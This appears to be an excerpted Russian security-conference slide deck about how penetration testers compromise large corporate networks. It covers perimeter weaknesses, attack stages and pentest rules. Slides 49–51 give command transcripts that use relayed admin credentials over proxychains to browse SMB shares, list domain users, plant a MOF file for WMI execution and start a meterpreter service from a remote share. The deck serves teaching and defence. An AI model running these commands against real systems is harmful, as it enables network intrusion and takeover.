Истории из жизни. Как взламывают сети крупных организаций.
1. Истории из жизни. Как взламывают
сети крупных организаций.
Дмитрий Евтеев
2. Что такое крупная сеть?
- информационная система, в которой > 1.000 пользователей
Архитектура крупной сети предполагает:
• Централизованное управление
• Единый источник идентификаторов
• Единая точка аутентификации и авторизации
• Территориальная распределенность
Введение
3. Веб-приложения
Интерфейсы администрирования
…и прочий «зоопарк»
DNS, интерфейсы обработки электронных сообщений, FTP,
интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,
NTP…
Что содержится на периметре
4. Телеком
На большом количестве сетевых устройств, найдутся такие, где
используются дефолты.
Промышленность
На большом количестве идентификаторов пользователей, найдутся
такие, которые используют слабые пароли к удаленному перебору.
Интересные наблюдения (по отрасли)
5. Госсектор
Неоправданно высокое внимание к отдельным направлениям
обеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.
Финансовый сектор
Пристальное внимание только к системам, обрабатывающим данные
держателей пластиковых карт, позволяет использовать уязвимости в
смежных системах.
Интересные наблюдения (по отрасли)
7. Основные этапы проведения атаки
Выявление целей и сбор данных об объектах
исследования
Сокрытиеследов
Поиск и эксплуатация уязвимостей
Сбор данных с новым уровнем доступа
Повышение привилегий
Сбор данных с новым уровнем доступа
Развитие атаки с имеющимися привилегиями
Закрепление своего присутствия
8. Соблюдение законов
Например: низя читать электронную пошту
Ограниченное время
Минимизация воздействия
Например: низя «убивать» аверов
Отчетность
Иногда требуется протокол всех совершаемых действий…
помимо пятисот страничного технического отчета
Оговорка по пентестам
9. Nmap, Nessus, etc.
Rapid7 Metasploit Framework
Immunity CANVAS
CORE Impact
SAINTexploit
Другие источники:
• public eq exploit-db.com
• private …
Поиск и эксплуатация уязвимостей
49. ~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$
ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > ls
AUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013
boot.ini AHS 213 Mon Jan 28 09:53:27 2013
...
~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$
~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-
<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
admin
IUSR_WAD
IWAM_WAD
krbtgt
...
Owned in 60 seconds with ZackAttack (5/7)
50. exec over winmgmt
~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$
ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > cd system32/wbem/mof
smb: system32wbemmof> put q.mof
putting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8
kb/s)
smb: system32wbemmof>
респект Вячеславу Егошину @vegoshin
Owned in 60 seconds with ZackAttack (6/7)
51. exec over metsvc
~# proxychains net rpc service create meterpreter meterpreter
"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
Successfully created Service: meterpreter
~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S
192.168.1.1
Owned in 60 seconds with ZackAttack (7/7)
52. Реализация успешного сценария атаки – это как
правило использование больше одной уязвимости
Чем больше по размеру информационная система, тем
больше возможных путей для реализации атак
Вместо заключения: простые истины